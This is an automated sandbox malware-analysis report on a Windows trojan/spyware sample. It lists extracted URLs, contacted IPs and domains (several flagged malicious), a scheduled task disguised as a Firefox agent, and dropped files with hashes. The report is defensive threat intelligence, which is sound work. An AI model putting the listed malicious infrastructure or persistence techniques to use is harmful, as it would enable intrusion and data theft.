                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA19355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA19355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id19ResponseX9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000007.00000003.307333178.0000024881668000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308081028.000002488166A000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2002/12/policy9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307532881.0000024881640000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.388802748.0000024EC83A9000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388847738.0000024EC8802000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388784689.0000024EC8388000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388834736.0000024EC8375000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388747468.0000024EC83C0000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388716971.0000024EC83C0000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000007.00000002.308040807.000002488164F000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307429419.0000024881648000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issue9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://get.adob9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/spnego9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                          high

                                                                                                                                                                                                          Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          188.166.28.199
                                                                                                                                                                                                          unknownNetherlands
                                                                                                                                                                                                          14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                          86.107.197.138
                                                                                                                                                                                                          unknownRomania
                                                                                                                                                                                                          39855MOD-EUNLfalse
                                                                                                                                                                                                          54.38.220.85
                                                                                                                                                                                                          unicupload.topFrance
                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                          104.21.41.11
                                                                                                                                                                                                          short.linkUnited States
                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          162.159.133.233
                                                                                                                                                                                                          cdn.discordapp.comUnited States
                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          91.243.44.128
                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                          395092SHOCK-1USfalse
                                                                                                                                                                                                          144.76.136.153
                                                                                                                                                                                                          transfer.shGermany
                                                                                                                                                                                                          24940HETZNER-ASDEfalse
                                                                                                                                                                                                          31.28.27.130
                                                                                                                                                                                                          host-data-coin-11.comRussian Federation
                                                                                                                                                                                                          12616HOSTING-MSKRUfalse
                                                                                                                                                                                                          185.233.81.115
                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                          50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                          164.132.207.80
                                                                                                                                                                                                          dodecoin.orgFrance
                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                          185.7.214.171
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          42652DELUNETDEtrue
                                                                                                                                                                                                          67.199.248.15
                                                                                                                                                                                                          bitly.comUnited States
                                                                                                                                                                                                          396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                                                                                                                                                          185.186.142.166
                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                          204490ASKONTELRUtrue
                                                                                                                                                                                                          67.199.248.10
                                                                                                                                                                                                          bit.lyUnited States
                                                                                                                                                                                                          396982GOOGLE-PRIVATE-CLOUDUSfalse

                                                                                                                                                                                                          Private

                                                                                                                                                                                                          IP
                                                                                                                                                                                                          192.168.2.1

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                          Analysis ID:546826
                                                                                                                                                                                                          Start date:31.12.2021
                                                                                                                                                                                                          Start time:19:21:09
                                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 13m 45s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:light
                                                                                                                                                                                                          Sample file name:3YzgU3S0nW.exe
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                          Number of analysed new started processes analysed:47
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@47/26@59/15
                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                                          • Successful, ratio: 18.4% (good quality ratio 13.4%)
                                                                                                                                                                                                          • Quality average: 54.8%
                                                                                                                                                                                                          • Quality standard deviation: 39.8%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 57%
                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Adjust boot time
                                                                                                                                                                                                          • Enable AMSI
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          Warnings:
                                                                                                                                                                                                          Show All
                                                                                                                                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                          • HTTP Packets have been reduced
                                                                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 40.91.112.76, 20.54.110.249, 52.251.79.25
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, patmushta.info, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • VT rate limit hit for: 3YzgU3S0nW.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          19:22:41Task SchedulerRun new task: Firefox Default Browser Agent CBFA1C8E0B7216DE path: C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          19:22:51API Interceptor7x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                          19:22:58API Interceptor1x Sleep call for process: 8132.exe modified
                                                                                                                                                                                                          19:23:06API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                          19:23:54API Interceptor13x Sleep call for process: 9355.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          ASN

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\ProgramData\sqlite3.dll
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):645592
                                                                                                                                                                                                          Entropy (8bit):6.50414583238337
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9355.exe.log
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):700
                                                                                                                                                                                                          Entropy (8bit):5.346524082657112
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                          MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                          SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                          SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                          SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):645592
                                                                                                                                                                                                          Entropy (8bit):6.50414583238337
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.11034894197500378
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:26zEtCXm/Ey6q99950Mq3qQ10nMCldimE8eawHjcXvti:26zYl682LyMCldzE9BHjcXU
                                                                                                                                                                                                          MD5:93FB3C24628984FFB890FA6E9C31EEA4
                                                                                                                                                                                                          SHA1:40A2B992DF6BB6D7CF75813A91405B104C83D4AC
                                                                                                                                                                                                          SHA-256:491517DF9ECA37645A12CCD8CA20FFBCD99DA62DF52977735421CAE41BF82915
                                                                                                                                                                                                          SHA-512:2C47D0123197AD01A6339BB666ECD0ED430EAC378409077968D7E917E3F34107F7F8A9F60BDA2B1DE348DC6B58C0EF7A2D0E0435A428D7625C08514BA31FE062
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ...................S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.H.......;%......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.1128246090353552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:CXm/Ey6q9995T1miM3qQ10nMCldimE8eawHza1miIAl/N:Xl68F1tMLyMCldzE9BHza1tIm/N
                                                                                                                                                                                                          MD5:AFDA996CEB50726FE3B00B09EEB54120
                                                                                                                                                                                                          SHA1:672EE4FA5993C6B7D1B6BE46AFFEF34367E11268
                                                                                                                                                                                                          SHA-256:67B4CC0078AEDC5D14BD8B4C56E30F8640D75141D283236FF5AAE7BB79CFB957
                                                                                                                                                                                                          SHA-512:4059C02B51D0F34896A8C88E8E3E49E7217E73E5A080017105AC5B32DD7B9A65D0EB0C908E92A3ADAF18E799A068CF5E3CE50BA68870C6493EC3AFD8AD586496
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ......|.............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.H.......Z.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.11267753938905724
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:EjXm/Ey6q9995N1mK2P3qQ10nMCldimE8eawHza1mKsP:Bl68/1iPLyMCldzE9BHza1w
                                                                                                                                                                                                          MD5:B1FE45F725CCF2AFB6A9687A61D6D202
                                                                                                                                                                                                          SHA1:3874ED630E52817EBEC1452A4F98E647A3BEE934
                                                                                                                                                                                                          SHA-256:0A7778967A1AD592BC00F0BF290B493DD8C6B0059F27A417041DF76B2A3C7DE0
                                                                                                                                                                                                          SHA-512:7460E6062684CEAE91CE31D1D95E369A2597931912A8018BFA7C20036B40A7820AEE4B64B575F0AF777F86FC03CDE83F8999D4A1B49BE8AC3776F1F553637677
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ......U.............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.H...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\175C.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):592384
                                                                                                                                                                                                          Entropy (8bit):5.168097770588799
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:kYRvaF96vYewL4ZAO3i0bEohlo4nN16tZGWA:FRvXUsFEZ7A
                                                                                                                                                                                                          MD5:66310F34A2567C8992BF25F58B4412CB
                                                                                                                                                                                                          SHA1:C8EE3470A4D1985C291E690A6E33AB101EB1FB9F
                                                                                                                                                                                                          SHA-256:9D6C372D28EBAF7D3811E7AFF549C117F7DBB2197ADD0FB6F8745C8B1EB436AC
                                                                                                                                                                                                          SHA-512:066A878E96C98779FF0B922860599E073480989001DEA8B347B391E17DAD912A9162AAF9A2CB42E6829D898BF97C8626C7E4CBEB17A4799312DE688A9B9C64A2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
